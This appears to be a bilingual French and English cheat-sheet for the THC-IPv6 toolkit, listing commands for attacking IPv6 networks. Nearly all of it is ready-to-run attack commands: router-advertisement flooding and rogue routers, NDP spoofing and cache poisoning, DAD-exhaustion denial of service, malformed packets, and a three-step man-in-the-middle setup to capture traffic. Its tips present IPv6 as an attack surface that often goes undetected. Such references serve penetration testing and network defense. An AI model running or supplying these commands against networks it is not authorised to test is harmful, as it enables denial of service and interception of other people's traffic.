thc-ipv6
Boîte à outils d'attaque IPv6. Suite complète pour les attaques réseau IPv6 : usurpation de neighbor discovery, flood de router advertisement, attaques DoS, MITM et exploitation d'infrastructure IPv6. IPv6 attack toolkit. Comprehensive suite for IPv6 network attacks — neighbor discovery spoofing, router advertisement flooding, DoS attacks, MITM, and IPv6 infrastructure exploitation.
↗ https://github.com/vanhauser-thc/thc-ipv6Overview
THC-IPv6 is a complete toolkit for attacking IPv6 networks. It exploits IPv6 protocol weaknesses including Neighbor Discovery Protocol (NDP) attacks, Router Advertisement (RA) flooding, Duplicate Address Detection (DAD) DoS, and various MITM techniques specific to IPv6.
Installation
sudo apt install thc-ipv6
Host Discovery
Discover IPv6 hosts on local network
alive6 eth0
Discover with verbose
alive6 -v eth0
Send multicast pings to find hosts
detect-new-ip6 eth0
Scan a specific IPv6 prefix
alive6 eth0 2001:db8::/64
Router Advertisement Flooding
Flood with fake router advertisements (causes MITM)
flood_router6 eth0
Rogue RA (become default router)
rogue_router6 eth0
Flood RS/RA to cause DoS
flood_router26 eth0
Neighbor Discovery Attacks
NDP spoofing (like ARP spoofing for IPv6)
parasite6 eth0
Flood NDP neighbor solicitations
flood_solicitate6 eth0 2001:db8::1
Neighbor cache poisoning
ndpexhaust6 eth0 victim6
DoS Attacks
Exhaust DAD process (prevent address assignment)
dos-new-ip6 eth0
Flood router with discovery requests
flood_rs6 eth0
Send malformed packets
exploit6 eth0 TARGET_IPV6 TYPE
MITM with IPv6
Step 1: Fake RA to become router
fake_router6 eth0 2001:db8::/64
Step 2: Enable IPv6 forwarding
sysctl -w net.ipv6.conf.all.forwarding=1
# Step 3: Traffic now routes through you
# Use wireshark/tcpdump to capture
Address Scanning
ping6 -I eth0 ff02::1 # All nodes
ping6 -I eth0 ff02::2 # All routers
Scan discovered hosts
nmap -6 -sV 2001:db8::1
Tips
- IPv6 attacks are often undetected — most IDS/IPS don’t inspect IPv6 as thoroughly
- RA flooding is devastating in IPv6 networks — clients accept RA from any router by default
- parasite6 is the IPv6 equivalent of arpspoof — intercepts neighbor cache
- Many networks have IPv6 enabled but unmanaged — a fertile attack surface
- Use in dual-stack environments where IPv4 is protected but IPv6 is overlooked
Help / Man page
THC-IPv6 tools:
alive6 — discover IPv6 hosts
fake_router6 — fake router advertisement
flood_router6 — RA flooding DoS
parasite6 — NDP cache poisoning (MITM)
dos-new-ip6 — DAD exhaustion
flood_solicitate6 — NDP flood
rogue_router6 — rogue router
detect-new-ip6 — detect new hosts
All tools: IFACE [options] [target]
Vue d’ensemble
THC-IPv6 est une boîte à outils complète pour attaquer les réseaux IPv6. Elle exploite les faiblesses du protocole IPv6, notamment les attaques Neighbor Discovery Protocol (NDP), le flood de Router Advertisement (RA), le DoS par Duplicate Address Detection (DAD), et diverses techniques de MITM spécifiques à IPv6.
Installation
sudo apt install thc-ipv6
Découverte d’hôtes
# Découvrir les hôtes IPv6 sur le réseau local
alive6 eth0
# Découverte en mode verbeux
alive6 -v eth0
# Envoyer des pings multicast pour trouver des hôtes
detect-new-ip6 eth0
# Scanner un préfixe IPv6 spécifique
alive6 eth0 2001:db8::/64
Flood de Router Advertisement
# Flooder avec de fausses annonces de routeur (provoque un MITM)
flood_router6 eth0
# RA malveillant (devenir le routeur par défaut)
rogue_router6 eth0
# Flooder RS/RA pour provoquer un DoS
flood_router26 eth0
Attaques Neighbor Discovery
# Usurpation NDP (équivalent de l'ARP spoofing pour IPv6)
parasite6 eth0
# Flood de sollicitations neighbor NDP
flood_solicitate6 eth0 2001:db8::1
# Empoisonnement du cache de voisins
ndpexhaust6 eth0 victim6
Attaques DoS
# Épuiser le processus DAD (empêcher l'attribution d'adresses)
dos-new-ip6 eth0
# Flooder le routeur avec des requêtes de découverte
flood_rs6 eth0
# Envoyer des paquets malformés
exploit6 eth0 TARGET_IPV6 TYPE
MITM avec IPv6
# Étape 1 : faux RA pour devenir le routeur
fake_router6 eth0 2001:db8::/64
# Étape 2 : activer le forwarding IPv6
sysctl -w net.ipv6.conf.all.forwarding=1
# Étape 3 : le trafic transite maintenant par vous
# Utiliser wireshark/tcpdump pour capturer
Scan d’adresses
ping6 -I eth0 ff02::1 # Tous les nœuds
ping6 -I eth0 ff02::2 # Tous les routeurs
# Scanner les hôtes découverts
nmap -6 -sV 2001:db8::1
Conseils
- Les attaques IPv6 passent souvent inaperçues : la plupart des IDS/IPS n’inspectent pas IPv6 aussi minutieusement
- Le flood RA est dévastateur sur les réseaux IPv6 : les clients acceptent par défaut les RA de n’importe quel routeur
- parasite6 est l’équivalent IPv6 d’arpspoof : il intercepte le cache de voisins
- Beaucoup de réseaux ont IPv6 activé mais non géré : une surface d’attaque fertile
- À utiliser sur des environnements dual-stack où IPv4 est protégé mais IPv6 est négligé
Aide / Page de manuel
THC-IPv6 tools:
alive6 — discover IPv6 hosts
fake_router6 — fake router advertisement
flood_router6 — RA flooding DoS
parasite6 — NDP cache poisoning (MITM)
dos-new-ip6 — DAD exhaustion
flood_solicitate6 — NDP flood
rogue_router6 — rogue router
detect-new-ip6 — detect new hosts
All tools: IFACE [options] [target]